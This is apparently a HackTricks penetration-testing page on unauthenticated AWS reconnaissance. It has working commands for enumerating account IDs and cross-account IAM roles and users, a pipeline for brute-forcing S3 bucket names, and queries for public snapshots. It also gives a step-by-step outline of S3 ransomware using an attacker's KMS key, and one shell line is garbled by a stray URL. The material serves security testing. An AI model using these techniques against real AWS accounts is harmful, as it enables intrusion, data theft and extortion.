Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If you have a target there are ways to try to identify account IDs of accounts related to the target.
You create a lest of potential account IDs and aliases and check them
# Check if an account ID exists
curl -v https://<acount_id>.signin.aws.amazon.com
## If response is 404 it doesn't, if 200, it exists
## It also works from account aliases
curl -v https://vodafone-uk2.signin.aws.amazon.com
You can automate this process with this tool.
Look for urls that contains <alias>.signin.aws.amazon.com
with an alias related to the organization.
If a vendor has instances in the marketplace, you can get the owner id (account id) of the AWS account he used.
- Public EBS snapshots (EC2 -> Snapshots -> Public Snapshots)
- RDS public snapshots (RDS -> Snapshots -> All Public Snapshots)
- Public AMIs (EC2 -> AMIs -> Public images)
Many AWS error messages (even access denied) will give that information.
{% hint style="danger" %} This technique doesn't work anymore as if the role exists or not you always get this error:
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas
You can test this running:
aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example
{% endhint %}
If you try to assume a role that you don’t have permissions to, AWS will output an error similar to:
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS
This error message indicates that the role exists, but its assume role policy document does not allow you to assume it. By running the same command, but targeting a role that does not exist, AWS will return:
An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole
Surprisingly, this process works cross-account. Given any valid AWS account ID and a well-tailored wordlist, you can enumerate the account’s existing roles without restrictions.
You can use this script to enumerate potential principals abusing this issue.
When setting up/update an IAM role trust policy, you are specifying what AWS resources/services can assume that role and gain temporary credentials.
When you save the policy, if the resource is found, the trust policy will save successfully, but if it is not found, then an error will be thrown, indicating an invalid principal was supplied.
{% hint style="warning" %} Note that in that resource you could specify a cross account role or user:
arn:aws:iam::acc_id:role/role_name
arn:aws:iam::acc_id:user/user_name
{% endhint %}
This is a policy example:
{
"Version":"2012-10-17",
"Statement":[
{
"Effect":"Allow",
"Principal":
{
"AWS":"arn:aws:iam::216825089941:role\/Test"
},
"Action":"sts:AssumeRole"
}
]
}
That is the error you will find if you uses a role that doesn't exist. If the role exist, the policy will be saved without any errors. (The error is for update, but it also works when creating)
### You could also use: aws iam update-assume-role-policy
# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
{
"Role": {
"Path": "/",
"RoleName": "Test-Role",
"RoleId": "AROA5ZDCUJS3DVEIYOB73",
"Arn": "arn:aws:iam::947247140022:role/Test-Role",
"CreateDate": "2022-05-03T20:50:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::316584767888:role/account-balance"
},
"Action": [
"sts:AssumeRole"
]
}
]
}
}
}
# When it doesn't work
aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"
You can automate this process with https://github.com/carlospolop/aws_tools
bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt
Our using Pacu:
run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
- The
admin
role used in the example is a role in your account to by impersonated by pacu to create the policies it needs to create for the enumeration
In the case the role was bad configured an allows anyone to assume it:
The attacker could just escalate to it.
A bucket is considered “public” if any user can list the contents of the bucket, and “private” if the bucket's contents can only be listed or written by certain users.
Companies might have buckets permissions miss-configured giving access either to everything or to everyone authenticated in AWS in any account (so to anyone). Note, that even with such misconfigurations some actions might not be able to be performed as buckets might have their own access control lists (ACLs).
Learn about AWS-S3 misconfiguration here: http://flaws.cloud and http://flaws2.cloud/
Different methods to find when a webpage is using AWS to storage some resources:
-
Using wappalyzer browser plugin
-
Using burp (spidering the web) or by manually navigating through the page all resources loaded will be save in the History.
-
Check for resources in domains like:
http://s3.amazonaws.com/[bucket_name]/ http://[bucket_name].s3.amazonaws.com/
-
Check for CNAMES as
resources.domain.com
might have the CNAMEbucket.s3.amazonaws.com
-
Check https://buckets.grayhatwarfare.com, a web with already discovered open buckets.
-
The bucket name and the bucket domain name needs to be the same.
- flaws.cloud is in IP 52.92.181.107 and if you go there it redirects you to https://aws.amazon.com/s3/. Also,
dig -x 52.92.181.107
givess3-website-us-west-2.amazonaws.com
. - To check it's a bucket you can also visit https://flaws.cloud.s3.amazonaws.com/.
- flaws.cloud is in IP 52.92.181.107 and if you go there it redirects you to https://aws.amazon.com/s3/. Also,
You can find buckets by brute-forcing names related to the company you are pentesting:
- https://github.com/sa7mon/S3Scanner
- https://github.com/clario-tech/s3-inspector
- https://github.com/jordanpotti/AWSBucketDump (Contains a list with potential bucket names)
- https://github.com/fellchase/flumberboozle/tree/master/flumberbuckets
- https://github.com/smaranchand/bucky
- https://github.com/tomdev/teh_s3_bucketeers
- https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/s3
# Generate a wordlist to create permutations
curl -s https://raw.githubusercontent.com/cujanovic/goaltdns/master/words.txt > /tmp/words-s3.txt.temp
curl -s https://raw.githubusercontent.com/jordanpotti/AWSBucketDump/master/BucketNames.txt >>/tmp/words-s3.txt.temp
cat /tmp/words-s3.txt.temp | sort -u > /tmp/words-s3.txt
# Generate a wordlist based on the domains and subdomains to test
## Write those domains and subdomains in subdomains.txt
cat subdomains.txt > /tmp/words-hosts-s3.txt
cat subdomains.txt | tr "." "-" >> /tmp/words-hosts-s3.txt
cat subdomains.txt | tr "." "\n" | sort -u >> /tmp/words-hosts-s3.txt
# Create permutations based in a list with the domains and subdomains to attack
goaltdns -l /tmp/words-hosts-s3.txt -w /tmp/words-s3.txt -o /tmp/final-words-s3.txt.temp
## The previous tool is specialized increating permutations for subdomains, lets filter that list
### Remove lines ending with "."
cat /tmp/final-words-s3.txt.temp | grep -Ev "\.$" > /tmp/final-words-s3.txt.temp2
### Create list without TLD
cat /tmp/final-words-s3.txt.temp2 | sed -E 's/\.[a-zA-Z0-9]+$//' > /tmp/final-words-s3.txt.temp3
### Create list without dots
cat /tmp/final-words-s3.txt.temp3 | tr -d "." > /tmp/final-words-s3.txt.temp4http://phantom.s3.amazonaws.com/
### Create list without hyphens
cat /tmp/final-words-s3.txt.temp3 | tr "." "-" > /tmp/final-words-s3.txt.temp5
## Generate the final wordlist
cat /tmp/final-words-s3.txt.temp2 /tmp/final-words-s3.txt.temp3 /tmp/final-words-s3.txt.temp4 /tmp/final-words-s3.txt.temp5 | grep -v -- "-\." | awk '{print tolower($0)}' | sort -u > /tmp/final-words-s3.txt
## Call s3scanner
s3scanner --threads 100 scan --buckets-file /tmp/final-words-s3.txt | grep bucket_exists
You can find all the supported regions by AWS in https://docs.aws.amazon.com/general/latest/gr/s3.html
You can get the region of a bucket with a dig
and nslookup
by doing a DNS request of the discovered IP:
dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11
nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
Check that the resolved domain have the word "website".
You can access the static website going to: flaws.cloud.s3-website-us-west-2.amazonaws.com
or you can access the bucket visiting: flaws.cloud.s3-us-west-2.amazonaws.com
If you try to access a bucket, but in the domain name you specify another region (for example the bucket is in bucket.s3.amazonaws.com
but you try to access bucket.s3-website-us-west-2.amazonaws.com
, then you will be indicated to the correct location:
To test the openness of the bucket a user can just enter the URL in their web browser. A private bucket will respond with "Access Denied". A public bucket will list the first 1,000 objects that have been stored.
Open to everyone:
Private:
You can also check this with the cli:
#Use --no-sign-request for check Everyones permissions
#Use --profile <PROFILE_NAME> to indicate the AWS profile(keys) that youwant to use: Check for "Any Authenticated AWS User" permissions
#--recursive if you want list recursivelyls
#Opcionally you can select the region if you now it
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
If the bucket doesn't have a domain name, when trying to enumerate it, only put the bucket name and not the whole AWSs3 domain. Example: s3://<BUCKETNAME>
- Attacker creates a KMS key in their own “personal” AWS account (or another compromised account) and provides “the world” access to use that KMS key for encryption. This means that it could be used by any AWS user/role/account to encrypt, but not decrypt objects in S3.
- Attacker identifies a target S3 bucket and gains write-level access to it, which is possible through a variety of different means. This could include poor configuration on buckets that expose them publicly or an attacker gaining access to the AWS environment itself. Typically attackers would target buckets with sensitive information, such as PII, PHI, logs, backups, and more.
- Attacker checks the configuration of the bucket to determine if it is able to be targeted by ransomware. This would include checking if S3 Object Versioning is enabled and if multi-factor authentication delete (MFA delete) is enabled. If Object Versioning is not enabled, then they are good to go. If Object Versioning is enabled, but MFA delete is disabled, the attacker can just disable the Object Versioning. If both Object Versioning and MFA delete are enabled, it would require a lot of extra work to be able to ransomware that specific bucket.
- Attacker uses the AWS API to replace each object in a bucket with a new copy of itself, but this time, it is encrypted with the attackers KMS key.
- Attacker schedules the deletion of the KMS key that was used for this attack, giving a 7 day window to their target until the key is deleted and the data is lost forever.
- Attacker uploads a final file such as “ransom-note.txt” without encryption, which instructs the target on how to get their files back.
The following screenshot shows an example of a file that was targeted for a ransomware attack. As you can see, the account ID that owns the KMS key that was used to encrypt the object (7**********2) is different than the account ID of the account that owns the object (2**********1).
Here you can find a ransomware example that does the following:
- Gathers the first 100 objects in the bucket (or all, if fewer than 100 objects in the bucket)
- One by one, overwrites each object with itself using the new KMS encryption key
For more info check the original research.
Cognito is an AWS service that enable developers to grant their app users access to AWS services. Developers will grant IAM roles to authenticated users in their app (potentially people willbe able to just sign up) and they can also grant an IAM role to unauthenticated users.
For basic info about Cognito check:
{% content-ref url="aws-services/aws-cognito-enum/" %} aws-cognito-enum {% endcontent-ref %}
Identity Pools can grant IAM roles to unauthenticated users that just know the Identity Pool ID (which is fairly common to find), and attacker with this info could try to access that IAM role and exploit it.
Moreoever, IAM roles could also be assigned to authenticated users that access the Identity Pool. If an attacker can register a user or already has access to the identity provider used in the identity pool you could access to the IAM role being given to authenticated users and abuse its privileges.
By default Cognito allows to register new user. Being able to register a user might give you access to the underlaying application or to the authenticated IAM access role of an Identity Pool that is accepting as identity provider the Cognito User Pool. Check how to do that here.
AWS allows to give access to anyone to download AMIs and Snapshots. You can list these resources very easily from your own account:
# Public AMIs
aws ec2 describe-images --executable-users all
## Search AMI by ownerID
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]'
## Search AMI by substr ("shared" in the example)
aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]'
# Public EBS snapshots (hard-drive copies)
aws ec2 describe-snapshots --restorable-by-user-ids all
aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")'
# Public RDS snapshots
aws rds describe-db-snapshots --include-public
## Search by account ID
aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]'
## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted)
## To share a RDS encrypted snapshot you need to share the KMS key also with the account
In the talk Breaking the Isolation: Cross-Account AWS Vulnerabilities it's presented how some services allow(ed) any AWS account accessing them because AWS services without specifying accounts ID were allowed.
During the talk they specify several examples, such as S3 buckets allowing cloudtrail (of any AWS account) yo write to them:
Other services found vulnerable:
- AWS Config
- Serverless repository
The services ARN is as follows:
arn:aws:[service]:[region]:[account-id]:[resource]
This is easily broteforceable if we focus on some specific services, we know all the regions (some services are global and doesn't even need to specify a region), have the account ID, and have prepared a wordlist to brute-force the resource name.
cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com |
---|---|
cloudfront | https://{random_id}.cloudfront.net |
cloudsearch | https://doc-{user\_provided}-{random\_id}.{region}.cloudsearch.amazonaws.com |
cloudsearch | <name>-<random>.<region>.cloudsearch.amazonaws.com |
documentdb | <name>.cluster-<random>.<region>.docdb.amazonaws.com |
ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com |
elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 |
elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com |
es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com |
execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} |
iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 |
iot | https://{random_id}.iot.{region}.amazonaws.com:8443 |
iot | https://{random_id}.iot.{region}.amazonaws.com:443 |
kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com |
kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com |
kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com |
mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com |
mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel |
mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com |
mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 |
mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 |
managed elasticsearch | https://vpc-{user\_provided}-\[random].\[region].es.amazonaws.com |
managed elasticsearch | https://search-{user\_provided}-\[random].\[region].es.amazonaws.com |
rabbitmq | https://b-\*\*\*\*-\*\*\*\*-\*\*\*\*-\*\*\*\*-\*\*\*.mq.\.amazonaws.com |
rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 |
rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 |
redshift | {user_provided}.<random>.<region>.redshift.amazonaws.com |
route 53 | {user_provided} |
s3 | https://{user_provided}.s3.amazonaws.com |
SQS | https://sqs.\[region].amazonaws.com/\[account-id]/{user\_provided} |
transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com |
You can find even more exposable services in:
{% embed url="https://github.com/SummitRoute/aws_exposable_resources" %}
- cloud_enum: Multi-cloud OSINT tool. Find public resources in AWS, Azure, and Google Cloud. Supported AWS services: Open / Protected S3 Buckets, awsapps (WorkMail, WorkDocs, Connect, etc.)
- https://www.youtube.com/watch?v=8ZXRw4Ry3mQ
- https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/
- https://hackingthe.cloud/aws/enumeration/enum_iam_user_role/
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md
Support HackTricks and get benefits!
- If you want to see your company advertised in HackTricks or if you want access to the latest version of the PEASS or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.